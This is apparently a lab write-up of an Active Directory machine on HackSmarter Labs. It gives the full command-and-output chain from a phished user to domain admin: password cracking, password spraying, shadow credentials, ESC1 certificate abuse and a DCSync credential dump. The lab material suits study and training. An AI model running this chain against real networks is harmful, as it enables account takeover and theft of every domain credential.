Scenario: You are a member of the Hack Smarter Red Team. During a phishing engagement, you were able to retrieve credentials for the client’s Active Directory environment. Use these credentials to enumerate the environment, elevate your privileges, and demonstrate impact for the client.
Starting Credentials
e.hills:Il0vemyj0b2025!
It is an easy-difficulty Active Directory machine on HackSmarter Labs.
Nmap
At first, we will scan the exposed services using Nmap.
└─$ nmap -v 10.0.27.151 -p- -oN nmap/ports_
Nmap scan report for 10.0.27.151
Host is up (0.026s latency).
Not shown: 65514 filtered tcp ports (no-response)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
3389/tcp open ms-wbt-server
5985/tcp open wsman
9389/tcp open adws
49664/tcp open unknown
49667/tcp open unknown
49679/tcp open unknown
49682/tcp open unknown
49715/tcp open unknown
49733/tcp open unknown
49880/tcp open unknown
From the port scan results, we can get the ports using the cut and truncate utility as following to use for the service scans.
└─$ echo '53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
3389/tcp open ms-wbt-server
5985/tcp open wsman
9389/tcp open adws
49664/tcp open unknown
49667/tcp open unknown
49679/tcp open unknown
49682/tcp open unknown
49715/tcp open unknown
49733/tcp open unknown
49880/tcp open unknown' | cut -d '/' -f1 | tr '\n' ','
53,88,135,139,389,445,464,593,636,3268,3269,3389,5985,9389,49664,49667,49679,49682,49715,49733,49880,
└─$ nmap -v 10.0.27.151 -p53,88,135,139,389,445,464,593,636,3268,3269,3389,5985,9389,49664,49667,49679,49682,49715,49733,49880 -A -oN nmap/service_
Nmap scan report for DC01.welcome.local (10.0.27.151)
Host is up (0.027s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2026-01-25 13:50:32Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: WELCOME.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.WELCOME.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.WELCOME.local
| Issuer: commonName=WELCOME-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-09-13T16:39:47
| Not valid after: 2026-09-13T16:39:47
| MD5: 2ded:dae3:3ecd:1cc4:58a7:dd02:4f41:2b6d
|_SHA-1: aa01:7b70:2f48:f3c8:4aa0:5357:aeb8:93e9:8cbd:53bc
|_ssl-date: 2026-01-25T13:52:08+00:00; 0s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: WELCOME.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.WELCOME.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.WELCOME.local
| Issuer: commonName=WELCOME-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-09-13T16:39:47
| Not valid after: 2026-09-13T16:39:47
| MD5: 2ded:dae3:3ecd:1cc4:58a7:dd02:4f41:2b6d
|_SHA-1: aa01:7b70:2f48:f3c8:4aa0:5357:aeb8:93e9:8cbd:53bc
|_ssl-date: 2026-01-25T13:52:08+00:00; 0s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: WELCOME.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.WELCOME.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.WELCOME.local
| Issuer: commonName=WELCOME-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-09-13T16:39:47
| Not valid after: 2026-09-13T16:39:47
| MD5: 2ded:dae3:3ecd:1cc4:58a7:dd02:4f41:2b6d
|_SHA-1: aa01:7b70:2f48:f3c8:4aa0:5357:aeb8:93e9:8cbd:53bc
|_ssl-date: 2026-01-25T13:52:08+00:00; 0s from scanner time.
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: WELCOME.local0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.WELCOME.local
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.WELCOME.local
| Issuer: commonName=WELCOME-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-09-13T16:39:47
| Not valid after: 2026-09-13T16:39:47
| MD5: 2ded:dae3:3ecd:1cc4:58a7:dd02:4f41:2b6d
|_SHA-1: aa01:7b70:2f48:f3c8:4aa0:5357:aeb8:93e9:8cbd:53bc
|_ssl-date: 2026-01-25T13:52:08+00:00; 0s from scanner time.
3389/tcp open ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2026-01-25T13:52:08+00:00; 0s from scanner time.
| rdp-ntlm-info:
| Target_Name: WELCOME
| NetBIOS_Domain_Name: WELCOME
| NetBIOS_Computer_Name: DC01
| DNS_Domain_Name: WELCOME.local
| DNS_Computer_Name: DC01.WELCOME.local
| DNS_Tree_Name: WELCOME.local
| Product_Version: 10.0.20348
|_ System_Time: 2026-01-25T13:51:29+00:00
| ssl-cert: Subject: commonName=DC01.WELCOME.local
| Issuer: commonName=DC01.WELCOME.local
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-10-27T15:46:43
| Not valid after: 2026-04-28T15:46:43
| MD5: 242b:566d:674b:702d:f73e:cee4:a92d:6581
|_SHA-1: 848f:035b:09f0:1735:2bc9:40b7:0f02:bee2:82c0:da7a
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49679/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49682/tcp open msrpc Microsoft Windows RPC
49715/tcp open msrpc Microsoft Windows RPC
49733/tcp open msrpc Microsoft Windows RPC
49880/tcp open msrpc Microsoft Windows RPC
Service scan shows that the certificate services(ADCS) are enabled. Along with the port scan, I also like to use Netexec to see if NTLM auth is allowed or only Kerberos authentication is allowed to connect to the Active Directory (AD).
└─$ nxc smb 10.0.27.151
SMB 10.0.27.151 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:WELCOME.local) (signing:True) (SMBv1:None) (Null Auth:True)
As NTLM Auth is not disabled, we can use password authentication to connect to the AD. Meanwhile, before we start enumerating services, let’s also update our hosts file (/etc/hosts).
10.0.27.151 DC01.welcome.local welcome.local
Enumerating Services
As we have credentials, lets start with enumerating the SMB service to see what shares we can access through the provided user. We can use also use the credentials to get BloodHound data.
BloodHound
└─$ nxc ldap 10.0.27.151 -u 'e.hills' -p 'Il0vemyj0b2025!' --bloodhound -c all --dns-server 10.0.27.151
LDAP 10.0.27.151 389 DC01 [*] Windows Server 2022 Build 20348 (name:DC01) (domain:WELCOME.local) (signing:None) (channel binding:Never)
LDAP 10.0.27.151 389 DC01 [+] WELCOME.local\e.hills:Il0vemyj0b2025!
LDAP 10.0.27.151 389 DC01 Resolved collection methods: rdp, group, psremote, acl, container, localadmin, session, trusts, objectprops, dcom
LDAP 10.0.27.151 389 DC01 Done in 0M 7S
LDAP 10.0.27.151 389 DC01 Compressing output into /home/kali/.nxc/logs/DC01_10.0.27.151_2026-01-25_143106_bloodhound.zip
Enumerating Shares
└─$ nxc smb 10.0.27.151 -u 'e.hills' -p 'Il0vemyj0b2025!'
SMB 10.0.27.151 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:WELCOME.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.0.27.151 445 DC01 [+] WELCOME.local\e.hills:Il0vemyj0b2025!
└─$ nxc smb 10.0.27.151 -u 'e.hills' -p 'Il0vemyj0b2025!' --shares
SMB 10.0.27.151 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:WELCOME.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.0.27.151 445 DC01 [+] WELCOME.local\e.hills:Il0vemyj0b2025!
SMB 10.0.27.151 445 DC01 [*] Enumerated shares
SMB 10.0.27.151 445 DC01 Share Permissions Remark
SMB 10.0.27.151 445 DC01 ----- ----------- ------
SMB 10.0.27.151 445 DC01 ADMIN$ Remote Admin
SMB 10.0.27.151 445 DC01 C$ Default share
SMB 10.0.27.151 445 DC01 Human Resources READ
SMB 10.0.27.151 445 DC01 IPC$ READ Remote IPC
SMB 10.0.27.151 445 DC01 NETLOGON READ Logon server share
SMB 10.0.27.151 445 DC01 SYSVOL READ Logon server share
We can see that this user has READ access over the ‘Human Resources’ share. Before enumerating the share, let’s get user’s list and Bloodhound data as we already have valid credentials.
User Enumeration
We can use Netexec to get the list of users and save it in a file.
└─$ nxc smb 10.0.27.151 -u 'e.hills' -p 'Il0vemyj0b2025!' --rid-brute | grep SidTypeUser | cut -d '\' -f2 | cut -d ' ' -f1 > users.txt
Human Resources Share
We can use smbclient to enumerate the HR share.
└─$ smbclient \\\\10.0.27.151\\'Human Resources' -U e.hills
Password for [WORKGROUP\e.hills]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Sun Sep 14 01:20:17 2025
.. D 0 Sat Sep 13 22:11:19 2025
Welcome 2025 Holiday Schedule.pdf A 84715 Sun Sep 14 00:18:12 2025
Welcome Benefits.pdf A 81466 Sun Sep 14 00:18:12 2025
Welcome Handbook Excerpts.pdf A 82644 Sun Sep 14 00:18:12 2025
Welcome Performance Review Guide.pdf A 79823 Sun Sep 14 00:18:12 2025
Welcome Start Guide.pdf A 89511 Sun Sep 14 00:18:12 2025
15568127 blocks of size 4096. 12046994 blocks available
smb: \>
We can download the files over smbclient from the share.
smb: \> recurse on
smb: \> prompt off
smb: \> mget *
getting file \Welcome 2025 Holiday Schedule.pdf of size 84715 as Welcome 2025 Holiday Schedule.pdf (442.4 KiloBytes/sec) (average 442.4 KiloBytes/sec)
getting file \Welcome Benefits.pdf of size 81466 as Welcome Benefits.pdf (503.5 KiloBytes/sec) (average 470.4 KiloBytes/sec)
getting file \Welcome Handbook Excerpts.pdf of size 82644 as Welcome Handbook Excerpts.pdf (504.4 KiloBytes/sec) (average 481.2 KiloBytes/sec)
getting file \Welcome Performance Review Guide.pdf of size 79823 as Welcome Performance Review Guide.pdf (569.0 KiloBytes/sec) (average 499.9 KiloBytes/sec)
getting file \Welcome Start Guide.pdf of size 89511 as Welcome Start Guide.pdf (647.5 KiloBytes/sec) (average 525.6 KiloBytes/sec)
smb: \>
Going through the files, Welcome Start Guide.pdf is password-protected. We can use the John-The-Ripper to attempt to crack the password for the file if it is protected by a weak password.
Shell as A.Harris
Cracking File Password
Before using John-The-Ripper, we have to convert the file to a hash format using pdf2john accepted by John.
└─$ pdf2john Welcome\ Start\ Guide.pdf
Welcome Start Guide.pdf:$pdf$4*4*128*-1060*1*16*fc591b1749ad08498b60ce3a81947b8c*32*9abeeb4695a10ac7b5e6558d39ee8c8300000000000000000000000000000000*32*e3e7eecc056a1ca2a2b0298352b0970f96ff1503022a1146e322e2f215dfd6be
└─$ pdf2john Welcome\ Start\ Guide.pdf > start_guide.hash
└─$ john start_guide.hash --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PDF, PDF encrypted document [MD5-RC4 / SHA2-AES 32/64])
Cost 1 (revision) is 4 for all loaded hashes
Cost 2 (key length) is 128 for all loaded hashes
Will run 4 OpenMP threads
Press Ctrl-C to abort, or send SIGUSR1 to john process for status
[REDACTED] (Welcome Start Guide.pdf)
1g 0:00:00:11 DONE (2026-01-25 14:40) 0.08503g/s 78955p/s 78955c/s 78955C/s hunbeach..hulachica
Use the "--show --format=PDF" options to display all of the cracked passwords reliably
Session completed.
The password for the file was successfully cracked using rockyou.txt list. We can access the file using the cracked password. Going through the file, it mentions the default password for newly created accounts.
Spraying Default Password
We can spray the default password to see if any user is still using the default credentials. Netexec can be used for password spraying.
└─$ nxc smb 10.0.27.151 -u users.txt -p 'Welcome2025!@' --continue-on-success
SMB 10.0.27.151 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:WELCOME.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.0.27.151 445 DC01 [-] WELCOME.local\Administrator:Welcome2025!@ STATUS_LOGON_FAILURE
SMB 10.0.27.151 445 DC01 [-] WELCOME.local\DC01$:Welcome2025!@ STATUS_LOGON_FAILURE
SMB 10.0.27.151 445 DC01 [-] WELCOME.local\e.hills:Welcome2025!@ STATUS_LOGON_FAILURE
SMB 10.0.27.151 445 DC01 [-] WELCOME.local\j.crickets:Welcome2025!@ STATUS_LOGON_FAILURE
SMB 10.0.27.151 445 DC01 [-] WELCOME.local\e.blanch:Welcome2025!@ STATUS_LOGON_FAILURE
SMB 10.0.27.151 445 DC01 [-] WELCOME.local\i.park:Welcome2025!@ STATUS_LOGON_FAILURE
SMB 10.0.27.151 445 DC01 [-] WELCOME.local\j.johnson:Welcome2025!@ STATUS_LOGON_FAILURE
SMB 10.0.27.151 445 DC01 [+] WELCOME.local\a.harris:Welcome2025!@
SMB 10.0.27.151 445 DC01 [-] WELCOME.local\svc_ca:Welcome2025!@ STATUS_LOGON_FAILURE
SMB 10.0.27.151 445 DC01 [-] WELCOME.local\svc_web:Welcome2025!@ STATUS_LOGON_FAILURE
The output shows that the default password is still being used for an account.
From the BloodHound data, this user is part of the Remote Management Users and can be used to connect to the DC using winrm service.
User Flag
└─$ evil-winrm-py -i DC01.welcome.local -u a.harris
_ _ _
_____ _(_| |_____ __ _(_)_ _ _ _ _ __ ___ _ __ _ _
/ -_\ V | | |___\ V V | | ' \| '_| ' |___| '_ | || |
\___|\_/|_|_| \_/\_/|_|_||_|_| |_|_|_| | .__/\_, |
|_| |__/ v1.5.0
Password: *************
[*] Connecting to 'DC01.welcome.local:5985' as 'a.harris'
evil-winrm-py PS C:\Users\a.harris\Documents>
evil-winrm-py PS C:\Users\a.harris\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
evil-winrm-py PS C:\Users\a.harris\Documents> cd ..
evil-winrm-py PS C:\Users\a.harris> tree /f /a
Folder PATH listing
Volume serial number is 6478-0CDD
C:.
+---Desktop
| user.txt
|
+---Documents
+---Downloads
+---Favorites
+---Links
+---Music
+---Pictures
+---Saved Games
\---Videos
evil-winrm-py PS C:\Users\a.harris> cd Desktop
evil-winrm-py PS C:\Users\a.harris\Desktop> type user.txt
[Flag_Redacted]
The user does not have any special privileges that can be exploited. The BloodHound data shows edges that can be used to move laterally.
Shell as Administrator
Looking back at the BloodHound, A.Harris user has Generic Write over I.Park user. Rather than changing the controlled user’s password, it is always preferred to request shadow credentials. We can use certipy to request shadow credentials.
Shadow Credentials
└─$ certipy-ad shadow auto -username a.harris@welcome.local -password 'Welcome2025!@' -account i.park -dc-ip 10.0.27.151 -ldap-scheme ldaps -dc-host DC01.welcome.local
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Targeting user 'i.park'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '61a69d84511a45fa894bf6c7f60f57ef'
[*] Adding Key Credential with device ID '61a69d84511a45fa894bf6c7f60f57ef' to the Key Credentials for 'i.park'
[*] Successfully added Key Credential with device ID '61a69d84511a45fa894bf6c7f60f57ef' to the Key Credentials for 'i.park'
[*] Authenticating as 'i.park' with the certificate
[*] Certificate identities:
[*] No identities found in this certificate
[*] Using principal: 'i.park@welcome.local'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'i.park.ccache'
[*] Wrote credential cache to 'i.park.ccache'
[*] Trying to retrieve NT hash for 'i.park'
[*] Restoring the old Key Credentials for 'i.park'
[*] Successfully restored the old Key Credentials for 'i.park'
[*] NT hash for 'i.park': b689c[..SNIPED..]
We can confirm the validity of the credentials using netexec and it works.
└─$ nxc smb 10.0.27.151 -u i.park -H 'b689c[..SNIPED..]'
SMB 10.0.27.151 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:WELCOME.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.0.27.151 445 DC01 [+] WELCOME.local\i.park:b689c[..SNIPED..]
The newly compromised user has ForceChangedPassword over additional two accounts, svc_ca and svc_web. Looking at the naming convention, we might be able to use svc_ca to look for vulnerable certificate templates, if any.
Therefore, rather than changing both user’s password at once, lets target svc_ca user first and see if we can use those credentials to find any vulnerable certificates. Otherwise, we can come back to the svc_web user later.
Exploiting ESC1
└─$ nxc smb 10.0.27.151 -u i.park -H 'b689c[..SNIPED..]' -M change-password -o USER=svc_ca NEWPASS='Password123!'
SMB 10.0.27.151 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:WELCOME.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.0.27.151 445 DC01 [+] WELCOME.local\i.park:b689c[..SNIPED..]
CHANGE-P... 10.0.27.151 445 DC01 [+] Successfully changed password for svc_ca
We can use the newly compromised user to enumerate vulnerable certificate templates using certipy.
└─$ certipy-ad find -vulnerable -u svc_ca -p 'Password123!' -dc-ip 10.0.27.151 -enabled
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Finding certificate templates
[*] Found 34 certificate templates
[*] Finding certificate authorities
[*] Found 1 certificate authority
[*] Found 12 enabled certificate templates
[*] Finding issuance policies
[*] Found 17 issuance policies
[*] Found 0 OIDs linked to templates
[*] Retrieving CA configuration for 'WELCOME-CA' via RRP
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'WELCOME-CA'
[*] Checking web enrollment for CA 'WELCOME-CA' @ 'DC01.WELCOME.local'
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[!] Error checking web enrollment: timed out
[!] Use -debug to print a stacktrace
[*] Saving text output to '20260125151736_Certipy.txt'
[*] Wrote text output to '20260125151736_Certipy.txt'
[*] Saving JSON output to '20260125151736_Certipy.json'
[*] Wrote JSON output to '20260125151736_Certipy.json'
Looking at the output file, one of the templates is vulnerable to ESC1.
└─$ cat 20260125151736_Certipy.txt
Certificate Authorities
0
CA Name : WELCOME-CA
DNS Name : DC01.WELCOME.local
Certificate Subject : CN=WELCOME-CA, DC=WELCOME, DC=local
Certificate Serial Number : 6E7A025A45F4E6A14E1F08B77737AFD9
Certificate Validity Start : 2025-09-13 16:39:33+00:00
Certificate Validity End : 2030-09-13 16:49:33+00:00
Web Enrollment
HTTP
Enabled : False
HTTPS
Enabled : False
User Specified SAN : Disabled
Request Disposition : Issue
Enforce Encryption for Requests : Enabled
Active Policy : CertificateAuthority_MicrosoftDefault.Policy
Permissions
Owner : WELCOME.LOCAL\Administrators
Access Rights
ManageCa : WELCOME.LOCAL\Administrators
WELCOME.LOCAL\Domain Admins
WELCOME.LOCAL\Enterprise Admins
ManageCertificates : WELCOME.LOCAL\Administrators
WELCOME.LOCAL\Domain Admins
WELCOME.LOCAL\Enterprise Admins
Enroll : WELCOME.LOCAL\Authenticated Users
Certificate Templates
0
Template Name : Welcome-Template
Display Name : Welcome-Template
Certificate Authorities : WELCOME-CA
Enabled : True
Client Authentication : True
Enrollment Agent : False
Any Purpose : False
Enrollee Supplies Subject : True
Certificate Name Flag : EnrolleeSuppliesSubject
Enrollment Flag : PublishToDs
Extended Key Usage : Server Authentication
Client Authentication
Requires Manager Approval : False
Requires Key Archival : False
Authorized Signatures Required : 0
Schema Version : 2
Validity Period : 1 year
Renewal Period : 6 weeks
Minimum RSA Key Length : 2048
Template Created : 2025-09-14T03:12:52+00:00
Template Last Modified : 2025-10-30T02:19:35+00:00
Permissions
Enrollment Permissions
Enrollment Rights : WELCOME.LOCAL\svc ca
WELCOME.LOCAL\Domain Admins
WELCOME.LOCAL\Enterprise Admins
Object Control Permissions
Owner : WELCOME.LOCAL\Administrator
Full Control Principals : WELCOME.LOCAL\Domain Admins
WELCOME.LOCAL\Enterprise Admins
Write Owner Principals : WELCOME.LOCAL\Domain Admins
WELCOME.LOCAL\Enterprise Admins
Write Dacl Principals : WELCOME.LOCAL\Domain Admins
WELCOME.LOCAL\Enterprise Admins
Write Property Enroll : WELCOME.LOCAL\Domain Admins
WELCOME.LOCAL\Enterprise Admins
[+] User Enrollable Principals : WELCOME.LOCAL\svc ca
[!] Vulnerabilities
ESC1 : Enrollee supplies subject and template allows client authentication.
To exploit ESC1, an attacker can request a certificate from a vulnerable template that allows client authentication and does not enforce proper subject name restrictions. By specifying the Administrator (or another privileged user) as the certificate subject, the attacker can obtain a certificate that can be used to authenticate as that user. This certificate can then be used for Kerberos authentication (e.g., PKINIT) to obtain a TGT and ultimately the NTLM hash of the target account. We can use certipy to impersonate the administrator.
└─$ certipy-ad req -u 'svc_ca@welcome.local' -p 'Password123!' -dc-ip 10.0.27.151 -target DC01.WELCOME.Local -ca WELCOME-CA -template 'Welcome-Template' -upn 'administrator@welcome.local' -sid 'S-1-5-21-141921413-1529318470-1830575104-500'
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Request ID is 21
[*] Successfully requested certificate
[*] Got certificate with UPN 'administrator@welcome.local'
[*] Certificate object SID is 'S-1-5-21-141921413-1529318470-1830575104-500'
[*] Saving certificate and private key to 'administrator.pfx'
[*] Wrote certificate and private key to 'administrator.pfx'
└─$ certipy-ad auth -pfx 'administrator.pfx' -dc-ip 10.0.27.151
Certipy v5.0.4 - by Oliver Lyak (ly4k)
[*] Certificate identities:
[*] SAN UPN: 'administrator@welcome.local'
[*] SAN URL SID: 'S-1-5-21-141921413-1529318470-1830575104-500'
[*] Using principal: 'administrator@welcome.local'
[*] Trying to get TGT...
[*] Got TGT
[*] Saving credential cache to 'administrator.ccache'
[*] Wrote credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@welcome.local': aad3b435b51404eeaad3b435b51404ee:0cf1[..SNIPED..]
We can confirm if the Administrator credentials are valid using Netexec.
└─$ nxc smb 10.0.27.151 -u Administrator -H 0cf1[..SNIPED..]
SMB 10.0.27.151 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:WELCOME.local) (signing:True) (SMBv1:None) (Null Auth:True)
SMB 10.0.27.151 445 DC01 [+] WELCOME.local\Administrator:0cf1[..SNIPED..] (Pwn3d!)
We can also do a DCSync attack to get all the user’s credentials.
└─$ secretsdump.py welcome.local/Administrator@DC01.welcome.local -hashes :0cf1[..SNIPED..] -just-dc-ntlm
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0cf1[..SNIPED..]:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:[..SNIPED..]:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:[..SNIPED..]:::
WELCOME.local\e.hills:1105:aad3b435b51404eeaad3b435b51404ee:[..SNIPED..]:::
WELCOME.local\j.crickets:1106:aad3b435b51404eeaad3b435b51404ee:[..SNIPED..]:::
WELCOME.local\e.blanch:1107:aad3b435b51404eeaad3b435b51404ee:[..SNIPED..]:::
WELCOME.local\i.park:1108:aad3b435b51404eeaad3b435b51404ee:[..SNIPED..]:::
WELCOME.local\j.johnson:1109:aad3b435b51404eeaad3b435b51404ee:[..SNIPED..]:::
WELCOME.local\a.harris:1110:aad3b435b51404eeaad3b435b51404ee:[..SNIPED..]:::
WELCOME.local\svc_ca:1112:aad3b435b51404eeaad3b435b51404ee:[..SNIPED..]:::
WELCOME.local\svc_web:1114:aad3b435b51404eeaad3b435b51404ee:[..SNIPED..]:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:[..SNIPED..]:::
[*] Cleaning up...
Root Flag
We can connect to the DC using the Administrator hash through the WinRM service.
└─$ evil-winrm-py -i DC01.welcome.local -u Administrator -H '0cf1[..SNIPED..]'
_ _ _
_____ _(_| |_____ __ _(_)_ _ _ _ _ __ ___ _ __ _ _
/ -_\ V | | |___\ V V | | ' \| '_| ' |___| '_ | || |
\___|\_/|_|_| \_/\_/|_|_||_|_| |_|_|_| | .__/\_, |
|_| |__/ v1.5.0
[*] Connecting to 'DC01.welcome.local:5985' as 'Administrator'
evil-winrm-py PS C:\Users\Administrator\Documents> cd ..
evil-winrm-py PS C:\Users\Administrator> cd Desktop
evil-winrm-py PS C:\Users\Administrator\Desktop> type root.txt
[Flag_Redacted]
evil-winrm-py PS C:\Users\Administrator\Desktop>
Thanks for reading along, and see you again soon as I try to be more regular with my write-ups!